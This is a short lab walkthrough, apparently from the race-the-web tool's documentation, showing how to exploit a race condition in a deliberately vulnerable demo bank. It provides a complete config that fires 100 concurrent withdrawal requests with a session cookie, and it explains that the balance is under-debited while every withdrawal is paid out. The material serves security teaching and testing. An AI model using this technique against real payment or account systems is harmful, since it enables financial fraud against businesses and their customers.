- Click “Initialize” to initialize a bank account with $10,000.
- Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
- Repeat the request with race-the-web. Your config file should look like the following:
# Make one request
count = 100
verbose = true
method = "POST"
url = "http://racetheweb.io/bank/withdraw"
# Withdraw 1 dollar
body = "amount=1"
# Insert your sessionId cookie below.
cookies = [“sessionId=<insert here>"]
redirects = false
- Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than when you originally withdrew money. However, due to a race condition flaw in the application, your balance will be much more, yet you will have received the money from the bank in every withdrawal.